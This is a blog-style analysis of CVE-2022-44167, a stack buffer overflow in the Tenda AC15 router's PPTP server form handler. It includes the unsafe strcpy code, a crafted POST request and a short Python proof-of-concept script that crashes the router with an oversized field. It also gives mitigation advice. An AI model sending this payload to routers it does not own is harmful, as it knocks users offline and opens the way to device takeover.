In late 2022, security researchers uncovered a critical buffer overflow vulnerability in the Tenda AC15 router (firmware version V15.03.05.18). Labeled CVE-2022-44167, this flaw resides in the formSetPPTPServer function and can allow remote attackers to execute arbitrary code, take control of the router, or crash the device.
In this exclusive analysis, I'll break down how this vulnerability works, show the related code, discuss potential exploit methods, and provide reference links for further reading. If you’re interested in router security or work with embedded devices, this is a mustread.
Where is the Bug?
When a user or device sends a request to set up a PPTP (Point-to-Point Tunneling Protocol) VPN server on the router, the request is handled by the formSetPPTPServer function. This function takes several parameters from HTTP POST data — and fails to properly check their length before copying them into a fixed-size buffer on the stack.
This is a classic cause of buffer overflow bugs, allowing anything from a crash to total compromise of the device.
Here's a simplified version of the buggy code (the real code is in C and embedded in GPL sources)
void formSetPPTPServer(request) {
char sServerIP[32];
// ... other variables ...
// Unsafe copying from request. "PPTPServerIP" is user-supplied!
strcpy(sServerIP, request->PPTPServerIP);
// More operations...
}
Notice that strcpy copies the incoming "PPTPServerIP" value straight into sServerIPwithout checking the size. If a malicious attacker sends a really long string, the data will overwrite nearby memory—stack smashing 101.
Exploiting the Flaw
An attacker could craft a specially formed POST request to the router’s web admin interface. For example:
POST /goform/formSetPPTPServer HTTP/1.1
Host: [router-ip]
Content-Type: application/x-www-form-urlencoded
Content-Length: 104
PPTPServerIP=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...[repeat "A" for 1024+ bytes]
If the memory just past sServerIP contains sensitive data or control values, they get overwritten.
- If the router isn’t using stack protections (like canaries or ASLR), the overwritten data can include the function’s return address, letting the attacker divert execution to their own code.
Here’s a simple Python script to crash a vulnerable AC15 router
import requests
router_url = "http://192.168..1/goform/formSetPPTPServer";
payload = "A" * 1024 # Overflows sServerIP buffer
data = {
"PPTPServerIP": payload
}
response = requests.post(router_url, data=data)
print("Response Code:", response.status_code)
Warning: Only use this on routers you own! This will likely crash the router or make it unresponsive.
What Can Attackers Achieve?
- Denial of Service: Force the router to crash/reboot, knocking all users offline.
- Remote Code Execution: Craft payloads that take over the device, install malware/backdoor, or spy on network traffic.
Persistence: Modify the router’s firmware or settings to resist resets.
Note: Internet-facing routers running this firmware (with remote admin enabled) are at much higher risk.
## Mitigation / Fix
- Update Firmware: Tenda has released updated firmware to patch this flaw (see official site).
References
- Official CVE: CVE-2022-44167
- Exploit Database PoC
- CNVD: Tenda AC15 buffer overflow advisory (Chinese)
- Tenda AC15 Firmware page
Summary
The CVE-2022-44167 buffer overflow in the Tenda AC15 router is a textbook example of how not to handle user input in networked devices. It’s easy for attackers to exploit, especially if the router is exposed to the open internet or used on untrusted networks.
If you own a Tenda AC15, update your firmware now.
Got questions or want more hands-on exploits? Let me know! Stay safe and keep your routers up-to-date.
*Written exclusively for you. Please use responsibly and only for educational/defensive purposes.*
Timeline
Published on: 11/21/2022 15:15:00 UTC
Last modified on: 11/21/2022 20:32:00 UTC